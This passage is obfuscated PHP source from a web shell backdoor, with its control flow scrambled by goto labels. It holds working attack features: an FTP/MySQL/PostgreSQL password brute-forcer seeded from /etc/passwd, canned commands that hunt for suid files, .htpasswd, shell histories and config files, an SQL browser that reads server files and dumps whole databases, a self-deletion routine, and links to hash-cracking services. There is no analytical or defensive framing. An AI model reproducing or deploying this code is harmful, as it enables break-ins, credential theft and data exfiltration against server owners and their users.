A2524; goto A1282; a7d3a: $i = strlen($line[0]) - 1; goto a7618; c8f4e: --$i; goto C9e8b; Af4db: } goto
a9273; a7fad: $line = explode(":", $line); goto Bd85c; d3acb: if (XCOPhBruteForce(@$server[0],
@$server[1], $line[0], $line[0])) { $success++; echo '<b>' . htmlspecialchars($line[0]) . '</b>:' .
htmlspecialchars($line[0]) . '<br>'; } goto Dff80; a9273: E7195: goto Ea1b2; Ea1b2: } dae22: } } elseif
($_POST['type'] == 2) { $temp = @file($_POST['dict']); if (is_array($temp)) { foreach ($temp as $line) {
goto D2bcb; D2bcb: $line = trim($line); goto c56a0; f8abf: fc64b: goto B0768; E2239: if
(XCOPhBruteForce($server[0], @$server[1], $_POST['login'], $line)) { $success++; echo '<b>' .
htmlspecialchars($_POST['login']) . '</b>:' . htmlspecialchars($line) . '<br>'; } goto f8abf; c56a0:
++$attempts; goto E2239; B0768: } C237d: } } goto Cf254; a06bf: $attempts = 0; goto D8768; D8768:
$server = explode(":", $_POST['server']); goto F6593; a7921: echo '<h1>Results</h1>
<div class=content><span>Type:</span> ' . htmlspecialchars($_POST['proto']) . ' <span>Server:</span> ' .
htmlspecialchars($_POST['server']) . '<br>'; goto f9b7a; b9d69: } goto Ee7b8; d7768: XCOPhHeader();
goto e5fa3; Ee7b8: echo '<h1>Bruteforce</h1>
<div class=content>
<table>
<form method=post>
<tr>
<td><span>Type</span></td>' . '<td><select name=proto>
<option value=ftp>FTP</option>
<option value=mysql>MySql</option>
<option value=pgsql>PostgreSql</option>
</select></td>
</tr>
<tr>
<td>' . '<input type=hidden name=c
value="' . htmlspecialchars($GLOBALS['cwd']) . '">' . '<input type=hidden
name=a value="' . htmlspecialchars($_POST['a']) . '">' . '<input type=hidden
name=charset value="' . htmlspecialchars($_POST['charset']) . '">' .
'<span>Server:port</span></td>' . '<td><input type=text name=server
value="127.0.0.1"></td>
</tr>' . '<tr>
<td><span>Brute type</span></td>' . '<td><label><input type=radio name=type
value="1" checked> /etc/passwd</label></td>
</tr>' . '<tr>
<td></td>
<td><label style="padding-left:15px"><input type=checkbox name=reverse value=1
checked> reverse (login -> nigol)</label></td>
</tr>' . '<tr>
<td></td>
<td><label><input type=radio name=type value="2"> Dictionary</label></td>
</tr>' . '<tr>
<td></td>
<td>
<table style="padding-left:15px">
<tr>
<td><span>Login</span></td>' . '<td><input type=text name=login
value="root"></td>
</tr>' . '<tr>
<td><span>Dictionary</span></td>' . '<td><input type=text name=dict
value="' . htmlspecialchars($GLOBALS['cwd']) . 'passwd.dic">
</td>
</tr>
</table>' . '
</td>
</tr>
<tr>
<td></td>
<td><input type=submit value=">>"></td>
</tr>
</form>
</table>'; goto d79e2; d79e2: echo '
</div><br>'; goto Fb2c4; Fb2c4: XCOPhFooter(); goto Bc573; Bc573: } goto F8b88; b3a8a: function
XCOPhWhich($p) { goto ff289; f9833: if (!empty($path)) { return $path; } goto c7552; c7552: return
false; goto F5937; ff289: $path = XCOPhEx('which ' . $p); goto f9833; F5937: } goto D59f0; Ab33f:
function XCOPhPermsColor($f) { if (!@is_readable($f)) { return '<font color=#FF0000>' .
XCOPhPerms(@fileperms($f)) . '</font>'; } elseif (!@is_writable($f)) { return '<font
color=white>' . XCOPhPerms(@fileperms($f)) . '</font>'; } else { return '<font color=#25ff00>' .
XCOPhPerms(@fileperms($f)) . '</font>'; } } goto E579f; e80d6: $default_charset =
'Windows-1251'; goto B8cff; a25c3: if (!empty($_POST['a']) && function_exists('action' .
$_POST['a'])) { call_user_func('action' . $_POST['a']); } goto b936e; F0eb8: if ($os == 'win') {
$aliases = array("List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b
index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active
connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net
user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig
/all"); } else { $aliases = array("List dir" => "ls -lha", "list file attributes on a Linux second
extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen",
"process status" => "ps aux", "Find" => "", "find all suid files" => "find / -type f -perm -04000
-ls", "find suid files in current dir" => "find . -type f -perm -04000 -ls", "find all sgid files"
=> "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm
-02000 -ls", "find config.inc.php files" => "find / -type f -name config.inc.php", "find config*
files" => "find / -type f -name \"config*\"", "find config* files in current dir" => "find . -type f
-name \"config*\"", "find all writable folders and files" => "find / -perm -2 -ls", "find all
writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" =>
"find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name
service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files
in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type
f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name
.bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find
.fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => "", "locate
httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf",
"locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate
psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" => "locate
admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate
conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate
config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate
config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config*
files " => "locate config", "locate .conf files" => "locate '.conf'", "locate .pwd files" => "locate
'.pwd'", "locate .sql files" => "locate '.sql'", "locate .htpasswd files" => "locate '.htpasswd'",
"locate .bash_history files" => "locate '.bash_history'", "locate .mysql_history files" => "locate
'.mysql_history'", "locate .fetchmailrc files" => "locate '.fetchmailrc'", "locate backup files" =>
"locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv"); } goto
C5959; A9967: function XCOPhsetcookie($k, $v) { $_COOKIE[$k] = $v; setcookie($k, $v); } goto e3323;
E6a75: function XCOPhLogin() { die("
<pre
align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>
"); } goto A9967; A9c07: function actionSelfRemove() { goto ca8a2; F269d: echo '<h1>Suicide</h1>
<div class=content>Really want to remove the shell?<br><a href=#
onclick="g(null,null,\'yes\')">Yes</a></div>'; goto ee48e; ee48e: XCOPhFooter(); goto E26e2;
ca8a2: if ($_POST['p1'] == 'yes') { if (@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__))) {
die('Shell has been removed'); } else { echo 'unlink error!'; } } goto Cc7bf; Cc7bf: if
($_POST['p1'] != 'yes') { XCOPhHeader(); } goto F269d; E26e2: } goto e6d6e; dc87f:
@ini_set('log_errors', 0); goto A9559; F8b88: function actionSql() { goto e17b9; E4a21: if
(@$_POST['type'] == 'mysql') { echo 'selected'; } goto B01a8; Ea111: $db = new
DbClass($_POST['type']); goto B5497; dd83c: echo '
</div>'; goto E236f; B01a8: echo ">MySql</option>
<option
value='pgsql' "; goto bf394; e17b9: class DbClass { var $type; var $link; var $res; function __construct($type) { $this->type = $type; } function connect($host, $user, $pass, $dbname) { goto C9ff9; F934d: Ea8f5: goto a2218; C9ff9: switch ($this->type) { case 'mysql': if ($this->link = @mysql_connect($host, $user, $pass, true)) { return true; } goto Ea8f5; case 'pgsql': goto B111b; ca878: goto Ea8f5; goto b9632; B111b: $host = explode(':', $host); goto B940b; Dcc30: if ($this->link = @pg_connect("
host={$host[0]} port={$host[1]} user={$user} password={$pass} dbname={$dbname}")) { return true; }
goto ca878; B940b: if (!$host[1]) { $host[1]=5432; } goto Dcc30; b9632: } goto efa86; efa86: E5d5f:
goto F934d; a2218: return false; goto e11a7; e11a7: } function selectdb($db) { goto cdbf0; cdbf0:
switch ($this->type) { case 'mysql': if (@mysql_select_db($db)) { return true; } goto f12fd; } goto
A322b; A9c10: f12fd: goto D7a54; D7a54: return false; goto b0d4a; A322b: C7685: goto A9c10; b0d4a: }
function query($str) { goto A2e14; a58ad: return false; goto fe694; A2e14: switch ($this->type) {
case 'mysql': return $this->res = @mysql_query($str); goto Ad894; case 'pgsql': return $this->res =
@pg_query($this->link, $str); goto Ad894; } goto D0064; D0064: A36d0: goto A4a57; A4a57: Ad894: goto
a58ad; fe694: } function fetch() { goto B20ad; B20ad: $res = func_num_args() ? func_get_arg(0) :
$this->res; goto A41ec; f9f85: d9a0b: goto d1cac; ea9e0: return false; goto Fb761; d1cac: Dc39c:
goto ea9e0; A41ec: switch ($this->type) { case 'mysql': return @mysql_fetch_assoc($res); goto Dc39c;
case 'pgsql': return @pg_fetch_assoc($res); goto Dc39c; } goto f9f85; Fb761: } function listDbs() {
goto F44a5; Add28: ed558: goto A4ab7; F44a5: switch ($this->type) { case 'mysql': return
$this->query("SHOW databases"); goto ed558; case 'pgsql': return $this->res = $this->query("SELECT
datname FROM pg_database WHERE datistemplate!='t'"); goto ed558; } goto b604e; b604e: a8ab7: goto
Add28; A4ab7: return false; goto f6533; f6533: } function listTables() { goto fab1f; c6c71: a3b34:
goto e6be7; e6be7: return false; goto e8e09; fab1f: switch ($this->type) { case 'mysql': return
$this->res = $this->query('SHOW TABLES'); goto a3b34; case 'pgsql': return $this->res =
$this->query("select table_name from information_schema.tables where table_schema !=
'information_schema' AND table_schema != 'pg_catalog'"); goto a3b34; } goto D8b78; D8b78: F26fc:
goto c6c71; e8e09: } function error() { goto a7fac; Ba7b0: Ccc41: goto Ec0e6; c97d4: return false;
goto F08b8; Ec0e6: c3902: goto c97d4; a7fac: switch ($this->type) { case 'mysql': return
@mysql_error(); goto c3902; case 'pgsql': return @pg_last_error(); goto c3902; } goto Ba7b0; F08b8:
} function setCharset($str) { goto e1b6b; e1b6b: switch ($this->type) { case 'mysql': if
(function_exists('mysql_set_charset')) { return @mysql_set_charset($str, $this->link); } else {
$this->query('SET CHARSET ' . $str); } goto a5b04; case 'pgsql': return
@pg_set_client_encoding($this->link, $str); goto a5b04; } goto eb01e; d7f7d: a5b04: goto C30e6;
eb01e: a7275: goto d7f7d; C30e6: return false; goto e7c48; e7c48: } function loadFile($str) { goto
C7a0e; Bcb39: return false; goto F39b4; A6c76: Dbdee: goto Bcb39; c903c: ca1ee: goto A6c76; C7a0e:
switch ($this->type) { case 'mysql': return $this->fetch($this->query("SELECT LOAD_FILE('" .
addslashes($str) . "') as file")); goto Dbdee; case 'pgsql': goto aaa85; a1680: return array('file'
=> implode("
", $r)); goto Ad302; A691a: goto F3940; goto bb298; b09b1: if (!($i = $this->fetch()))
{ goto D1e18; } goto eb672; aaa85: $this->query("CREATE TABLE XCOPh2(file text);COPY XCOPh2 FROM '"
. addslashes($str) . "';select file from XCOPh2;"); goto c6b1b; Adda9: F3940: goto b09b1; bb298:
D1e18: goto Aa9b5; c6b1b: $r = array(); goto Adda9; eb672: $r[] = $i['file']; goto A691a; Ad302:
goto Dbdee; goto fdbce; Aa9b5: $this->query('drop table XCOPh2'); goto a1680; fdbce: } goto c903c;
F39b4: } function dump($table, $fp = false) { goto E3972; f47d7: f6cd3: goto c0503; e4d6c: return
false; goto c1709; c0503: Cf624: goto e4d6c; E3972: switch ($this->type) { case 'mysql': goto Fea55;
E80c2: goto Cf624; goto b56ed; b1227: if ($fp) { fwrite($fp, $sql); } else { echo $sql; } goto
f9ba1; d9ef1: $columns = array(); goto ffbf1; F5eb6: if ($head) { $sql .= 'INSERT INTO `' . $table .
'` (' . implode(", ", $columns) . ") VALUES
(" . implode(", ", $item) . ')'; $head = false; }
else { $sql .= "
,(" . implode(", ", $item) . ')'; } goto e8865; ffbf1: foreach ($item as $k =>
$v) { goto a927d; D653d: $columns[] = "`" . $k . "`"; goto Bc50b; Bc50b: C46bc: goto c6f63; a927d:
if ($v === null) { $item[$k] = "NULL"; } elseif (is_int($v)) { $item[$k] = $v; } else { $item[$k] =
"'" . @mysql_real_escape_string($v) . "'"; } goto D653d; c6f63: } goto A2263; A2263: C0dcc: goto
F5eb6; F080f: $create = mysql_fetch_array($res); goto fc6d0; Edc77: goto Be6cd; goto B2b6d; fc6d0:
$sql = $create[1] . ";
"; goto b1227; f9ba1: $this->query('SELECT * FROM `' . $table . '`'); goto
baf43; f88a3: if ($i % 1000 == 0) { $head = true; $sql = ";
"; } goto d9ef1; d9577: $head = true;
goto def9a; def9a: Be6cd: goto Bbe78; Cf4ed: $i++; goto Edc77; Ef71d: if (!$head) { if ($fp) {
fwrite($fp, ";
"); } else { echo ";
"; } } goto E80c2; baf43: $i = 0; goto d9577; Bbe78: if
(!($item = $this->fetch())) { goto B550e; } goto dd624; e8865: if ($fp) { fwrite($fp, $sql); } else
{ echo $sql; } goto Cf4ed; B2b6d: B550e: goto Ef71d; dd624: $sql = ''; goto f88a3; Fea55: $res =
$this->query('SHOW CREATE TABLE `' . $table . '`'); goto F080f; b56ed: case 'pgsql': goto b0e7f;
D64ed: if (!($item = $this->fetch())) { goto ca8e5; } goto aa892; A32c5: $sql = 'INSERT INTO ' .
$table . ' (' . implode(", ", $columns) . ') VALUES (' . implode(", ", $item) . ');' . "
"; goto
ba278; E8578: foreach ($item as $k => $v) { goto a0bba; Dd239: $columns[] = $k; goto c70e5; c70e5:
c2f4a: goto d186a; a0bba: $item[$k] = "'" . addslashes($v) . "'"; goto Dd239; d186a: } goto A2bc6;
Ba9a0: goto D3159; goto F22d7; A2bc6: B3766: goto A32c5; b0e7f: $this->query('SELECT * FROM ' .
$table); goto E27bd; F22d7: ca8e5: goto E22af; aa892: $columns = array(); goto E8578; E27bd: D3159:
goto D64ed; E22af: goto Cf624; goto Dd11c; ba278: if ($fp) { fwrite($fp, $sql); } else { echo $sql;
} goto Ba9a0; Dd11c: } goto f47d7; c1709: } } goto Ea111; B5497: if (@$_POST['p2'] == 'download' &&
@$_POST['p1'] != 'select') { goto fd7d9; A6d50: if (empty($_POST['file'])) { goto B7697; a5824:
header("Content-Type: text/plain"); goto f89b4; B7697: ob_start("ob_gzhandler", 4096); goto e461a;
f89b4: foreach ($_POST['tbl'] as $v) { $db->dump($v); B3839: } goto e34c9; e34c9: Bf2a2: goto a6996;
e461a: header("Content-Disposition: attachment; filename=dump.sql"); goto a5824; a6996: exit; goto
C2c9b; C2c9b: } elseif ($fp = @fopen($_POST['file'], 'w')) { goto D06ea; E8120: unset($_POST['p2']);
goto a7d60; c5843: a68b1: goto ba492; ba492: fclose($fp); goto E8120; D06ea: foreach ($_POST['tbl']
as $v) { $db->dump($v, $fp); b32d1: } goto c5843; a7d60: } else { die('
<script>alert("Error! Can\'t open file"); window.history.back(-1)</script>'); } goto a535e; C0a5c:
d17cc: goto A6d50; dc5c9: Fa4bc: goto C0a5c; fd7d9: $db->connect($_POST['sql_host'],
$_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']); goto C6675; b87c5: switch
($_POST['charset']) { case "Windows-1251": $db->setCharset('cp1251'); goto d17cc; case "UTF-8":
$db->setCharset('utf8'); goto d17cc; case "KOI8-R": $db->setCharset('koi8r'); goto d17cc; case
"KOI8-U": $db->setCharset('koi8u'); goto d17cc; case "cp866": $db->setCharset('cp866'); goto d17cc;
} goto dc5c9; C6675: $db->selectdb($_POST['sql_base']); goto b87c5; a535e: } goto aac0f; F1182: if
(isset($_POST['sql_host'])) { if ($db->connect($_POST['sql_host'], $_POST['sql_login'],
$_POST['sql_pass'], $_POST['sql_base'])) { goto Ee3b2; b4b5d: E6555: goto E386d; A205f: echo
"<select name=sql_base>
<option value=''></option>"; goto E440e; D1e77: list($key, $value) = each($item); goto E1c9b;
E386d: B5453: goto E7035; C3bbf: echo '
</select>'; goto f3b73; Ee3b2: switch ($_POST['charset']) { case "Windows-1251":
$db->setCharset('cp1251'); goto B5453; case "UTF-8": $db->setCharset('utf8'); goto B5453; case
"KOI8-R": $db->setCharset('koi8r'); goto B5453; case "KOI8-U": $db->setCharset('koi8u'); goto B5453;
case "cp866": $db->setCharset('cp866'); goto B5453; } goto b4b5d; Bfa7e: if (!($item =
$db->fetch())) { goto ae143; } goto D1e77; c1585: ae143: goto C3bbf; E7035: $db->listDbs(); goto
A205f; E440e: Dd783: goto Bfa7e; E1c9b: echo '
<option value="' . $value . '" ' . ($value == $_POST[' sql_base'] ? 'selected' : '' ) . '>' . $value
. '</option>' ; goto E77f9; E77f9: goto Dd783; goto c1585; f3b73: } else { echo $tmp; } } else {
echo $tmp; } goto B941a; bf394: if (@$_POST['type']=='pgsql' ) { echo 'selected' ; } goto Ef8da;
aac0f: XCOPhHeader(); goto A824b; B941a:
echo "</td>
<td><input type=submit value='>>' onclick='fs(d.sf);'></td>
<td><input type=checkbox name=sql_count value='on'"
. (empty($_POST['sql_count']) ? '' : ' checked' )
. "> count the number of rows</td>
</tr>
</table>
<script>
s_db = '"
. @addslashes($_POST['sql_base'])
. "';
function fs(f) {
if(f.sql_base.value!=s_db) { f.onsubmit = function() {};
if(f.p1) f.p1.value='';
if(f.p2) f.p2.value='';
if(f.p3) f.p3.value='';
}
}
function st(t,l) {
d.sf.p1.value = 'select';
d.sf.p2.value = t;
if(l && d.sf.p3) d.sf.p3.value = l;
d.sf.submit();
}
function is() {
for(i=0;i<d.sf.elements['tbl[]'].length;++i)
d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;
}
</script>"
; goto Cc002; A824b:
echo "
<h1>Sql browser</h1><div class=content>
<form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr>
<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>
<input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='"
. htmlspecialchars($GLOBALS['cwd']) . "'><input type=hidden name=charset value='" .
(isset($_POST['charset']) ? $_POST['charset'] : '' )
. "'>
<td><select name='type'><option value='mysql' " ; goto E4a21; Ef8da:
echo ">PostgreSql</option></select></td>
<td><input type=text name=sql_host value=\"" . (empty($_POST['sql_host']) ? 'localhost' : htmlspecialchars($_POST['sql_host'])) . "
\">
</td>
<td><input type=text name=sql_login value=\"" . (empty($_POST['sql_login']) ? 'root' :
htmlspecialchars($_POST['sql_login'])) . "\"></td>
<td><input type=text name=sql_pass
value=\"" . (empty($_POST['sql_pass']) ? '' : htmlspecialchars($_POST['sql_pass'])) . "\">
</td>
<td>"; goto a0256; a0256: $tmp = "<input type=text name=sql_base value=''>"; goto F1182; Cc002: if
(isset($db) && $db->link) { goto Df5a6; fe95c: if (@$_POST['p1'] == 'loadfile') { $file =
$db->loadFile($_POST['p2']); echo '<br />
<pre class=ml1>' . htmlspecialchars($file['file']) . '</pre>'; } goto cc355; A93c6: if
($_POST['type'] == 'mysql') { $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@',
`host`) = USER() AND `File_priv` = 'y'"); if ($db->fetch()) { echo "<form
onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'>
<span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit
value='>>'></form>"; } } goto fe95c; ac300: if (!empty($_POST['sql_base'])) { goto
D037f; D037f: $db->selectdb($_POST['sql_base']); goto d400f; D3b42: echo "<br></form>
<form
onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'>
<textarea name='query'
style='width:100%;height:100px'>"; goto c9020; b24d0: echo "<nobr><input type='checkbox' name='tbl[]' value='" . $value . "'> <a href=# onclick=\"st('" . $value . "',1)\">" . $value . "</a>" . (empty($_POST['sql_count']) ? ' ' : " <small>({$n['n']})</small>") . "</nobr><br>"; goto c844c; ca784: list($key, $value) = each($item); goto B9de4; Ef333: $value = htmlspecialchars($value); goto b24d0; a757b: if (@$_POST['p1'] == 'query' && !empty($_POST['p2'])) { $db->query(@$_POST['p2']); if ($db->res !== false) { goto b2e3b; d027c: if (!($item = $db->fetch())) { goto C052b; } goto De3c3; b2e3b: $title = false; goto f9c00; f9c00: echo '<table width=100% cellspacing=1 cellpadding=2 class=main style="background-color:#292929">'; goto B97cf; cd66c: F18be: goto A4f4b; Fb907: echo '<tr class="l' . $line . '">'; goto E9660; c7578: echo '</table>'; goto c7dec; E9660: $line = $line == 1 ? 2 : 1; goto Ce011; ea415: C052b: goto c7578; De3c3: if (!$title) { goto d1a55; ac71f: $line = 2; goto D2708; ace2f: echo '</tr><tr>'; goto ac71f; d1a55: echo '<tr>'; goto a767b; d4516: e507f: goto ee135; a767b: foreach ($item as $key => $value) { echo '<th>' . $key . '</th>'; A7e1f: } goto d4516; ee135: reset($item); goto Ac255; Ac255: $title = true; goto ace2f; D2708: } goto Fb907; A4f4b: echo '</tr>'; goto Ec8f2; e921c: e5138: goto d027c; Ec8f2: goto e5138; goto ea415; Ce011: foreach ($item as $key => $value) { if ($value == null) { echo '<td><i>null</i></td>'; } else { echo '<td>' . nl2br(htmlspecialchars($value)) . '</td>'; } e4998: } goto cd66c; B97cf: $line = 1; goto e921c; c7dec: } else { echo '<div><b>Error:</b> ' . htmlspecialchars($db->error()) . '</div>'; } } goto D3b42; Dc057: if (!($item = $db->fetch($tbls_res))) { goto B72e5; } goto ca784; ea989: B72e5: goto e7993; dfaf9: $tbls_res = $db->listTables(); goto Aa52e; d400f: echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>"; goto dfaf9; D296b: echo "</td></tr>"; goto Ecd44; a7e37: if (@$_POST['p1'] == 'select') { goto A2ec8; D4b65: $pages = ceil($num['n'] / 30); goto b5f2a; A2ec8: $_POST['p1'] = 'query'; goto ec107; b5f2a: echo "<script>d.sf.onsubmit = function () {
st(\"".$_POST['p2']. "\", d.sf.p3.value)}</script><span>" . $_POST['p2'] . "</span> ({$num['n']} records) Page # <input type=text name='p3' value=" . (int) $_POST['p3'] . ">"; goto E3cfe; E58be: if ($_POST['p3'] < $pages) { echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3'] + 1) . ")'>Next ></a>"; } goto fdb55; E3cfe: echo " of {$pages}"; goto c2a33; ec107: $_POST['p3'] = $_POST['p3'] ? $_POST['p3'] : 1; goto B23f1; fdb55: $_POST['p3']--; goto Eae43; B23f1: $db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']); goto F2274; c2a33: if ($_POST['p3'] > 1) { echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3'] - 1) . ")'>< Prev</a>"; } goto E58be; Eae43: if ($_POST['type'] == 'pgsql') { $_POST['p2'] = 'SELECT * FROM ' . $_POST['p2'] . ' LIMIT 30 OFFSET ' . $_POST['p3'] * 30; } else { $_POST['p2'] = 'SELECT * FROM `' . $_POST['p2'] . '` LIMIT ' . $_POST['p3'] * 30 . ',30'; } goto E3330; E3330: echo "<br><br>"; goto F82b6; F2274: $num = $db->fetch(); goto D4b65; F82b6: } goto a757b; c844c: goto b4e3a; goto ea989; c9020: if (!empty($_POST['p2']) && $_POST['p1'] != 'loadfile') { echo htmlspecialchars($_POST['p2']); } goto A7155; e7993: echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>"; goto a7e37; Aa52e: b4e3a: goto Dc057; B9de4: if (!empty($_POST['sql_count'])) { $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM ' . $value . '')); } goto Ef333; A7155: echo "</textarea><br /><input
type=submit value='Execute'>"; goto D296b; Ecd44: } goto d8314; d8314: echo "</table>
</form><br />"; goto A93c6; Df5a6: echo "<br />
<table width=100% cellpadding=2 cellspacing=0>"; goto ac300; cc355: } else { echo
htmlspecialchars($db->error()); } goto dd83c; E236f: XCOPhFooter(); goto f8ee3; f8ee3: }
goto B626d; E39a8: if (!function_exists("posix_getpwuid") &&
strpos($GLOBALS['disable_functions'], 'posix_getpwuid') === false) { function
posix_getpwuid($p) { return false; } } goto d8f3d; Cf332: function actionStringTools() {
goto Ab0dd; e68b0: if (!empty($_POST['p1'])) { if (in_array($_POST['p1'], $stringTools)) {
echo htmlspecialchars($_POST['p1']($_POST['p2'])); } } goto dae7a; d6482: if
(!function_exists('full_urlencode')) { function full_urlencode($p) { goto cc727; ea348: $i =
0; goto e8e4b; A3f49: goto Ea3fb; goto f9d5f; bee72: Ff928: goto Feb22; cc727: $r = ''; goto
ea348; bc6f8: return strtoupper($r); goto Caa7f; Bed8f: if (!($i < strlen($p))) { goto
D58c5; } goto Deeea; Deeea: $r .='%' . dechex(ord($p[$i])); goto bee72; f9d5f: D58c5:
goto bc6f8; Feb22: ++$i; goto A3f49; e8e4b: Ea3fb: goto Bed8f; Caa7f: } } goto be18d;
Db5ad: XCOPhHeader(); goto f8263; ebabf: foreach ($stringTools as $k=> $v) { echo "
<option value='" . htmlspecialchars($v) . "'>" . $k . "</option>"; A4b18: } goto e3448; dae7a: echo "
</pre>
</div><br>
<h1>Search files:</h1>
<div class=content>
<form onsubmit=\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return
false;\">
<table cellpadding='1' cellspacing='0' width='50%'>
<tr>
<td width='1%'>Text:</td>
<td><input type='text' name='text' style='width:100%'></td>
</tr>
<tr>
<td>Path:</td>
<td><input type='text' name='cwd' value='" . htmlspecialchars($GLOBALS[' cwd'])
. "' style='width:100%'></td></tr>
<tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr>
<tr><td></td><td><input type='submit' value='>>'></td></tr>
</table></form>"
; goto F7330; e3448: a4cad: goto Fda86; c9f71: if (isset($_POST['ajax'])) { goto a3d31; b99a9:
exit; goto e05d6; Fd322: echo strlen($temp), "
" , $temp; goto b99a9; c5832: if
(in_array($_POST['p1'], $stringTools)) { echo $_POST['p1']($_POST['p2']); } goto Aee67; fca99:
ob_start(); goto c5832; Aee67:
$temp="document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='"
. addcslashes(htmlspecialchars(ob_get_clean()), "
\'" ) . "';
" ; goto Fd322; a3d31:
XCOPhsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax' , true); goto fca99; e05d6: } goto Ec7f9;
be18d: $stringTools=array('Base64 encode'=> 'base64_encode', 'Base64 decode' => 'base64_decode',
'Url encode' => 'urlencode', 'Url decode' => 'urldecode', 'Full urlencode' => 'full_urlencode', 'md5
hash' => 'md5', 'sha1 hash' => 'sha1', 'crypt' => 'crypt', 'CRC32' => 'crc32', 'ASCII to HEX' =>
'ascii2hex', 'HEX to ASCII' => 'hex2ascii', 'HEX to DEC' => 'hexdec', 'HEX to BIN' => 'hex2bin',
'DEC to HEX' => 'dechex', 'DEC to BIN' => 'decbin', 'BIN to HEX' => 'binhex', 'BIN to DEC' =>
'bindec', 'String to lower case' => 'strtolower', 'String to upper case' => 'strtoupper',
'Htmlspecialchars' => 'htmlspecialchars', 'String length' => 'strlen'); goto c9f71; B3b3d: if
(!function_exists('ascii2hex')) { function ascii2hex($p) { goto Bc47b; A39d1: ++$i; goto Fa350;
c459b: $r .= sprintf('%02X', ord($p[$i])); goto F32c0; c46fe: $i = 0; goto f6975; c9510: if (!($i <
strlen($p))) { goto A06c2; } goto c459b; Fa350: goto A3e0b; goto Bc70c; F32c0: Aab79: goto
A39d1; f6975: A3e0b: goto c9510; Abff3: return strtoupper($r); goto dbe01; Bc47b: $r='' ; goto
c46fe; Bc70c: A06c2: goto Abff3; dbe01: } } goto d6482; f4886: if
(!function_exists('hex2ascii')) { function hex2ascii($p) { goto a74a2; a74a2: $r='' ; goto
f8392; F0752: $i +=2; goto F7ba2; ba4ec: A1fb1: goto F0752; f8392: $i=0; goto C4f54; C4f54:
c7fe6: goto B413a; F7ba2: goto c7fe6; goto C962e; A9328: $r .=chr(hexdec($p[$i] . $p[$i + 1]));
goto ba4ec; cbb1e: return $r; goto a706c; B413a: if (!($i < strLen($p))) { goto B08d9; } goto
A9328; C962e: B08d9: goto cbb1e; a706c: } } goto B3b3d; Fda86:
echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 " .
(@$_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax' ] ? 'checked' : '' )
. "> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>" .
(empty($_POST['p1']) ? '' : htmlspecialchars(@$_POST['p2']))
. "</textarea></form><pre class='ml1' style='" . (empty($_POST['p1']) ? 'display:none;' : '' )
. "margin-top:5px' id='strOutput'>" ; goto e68b0; f8263:
echo '<h1>String conversions</h1><div class=content>' ; goto b6325; b6325:
echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>"
; goto ebabf; a857e:
echo "</div><br><h1>Search for hash:</h1><div class=content>
<form method='post' target='_blank' name='hf'>
<input type='text' name='hash' style='width:200px;'><br>
<input type='hidden' name='act' value='find'/>
<input type='button' value='hashcracking.ru' onclick=\"
document.hf.action='https://hashcracking.ru/index.php' ;document.hf.submit()\">
<br>
<input type='button' value='md5.rednoize.com'
onclick=\"document.hf.action='http://md5.rednoize.com/?q='
+document.hf.hash.value+'&s=md5';document.hf.submit()\"><br>
<input type='button'
value='crackfor.me' onclick=\"document.hf.action='http://crackfor.me/index.php'
;document.hf.submit()\"><br>
</form>
</div>"; goto e2a28; d35ed: if (!function_exists('binhex')) { function binhex($p) { return dechex(bindec($p)); } } goto
f4886; da79a: if (@$_POST['p3']) { XCOPhRecursiveGlob($_POST['c']); } goto a857e; Ab0dd: if
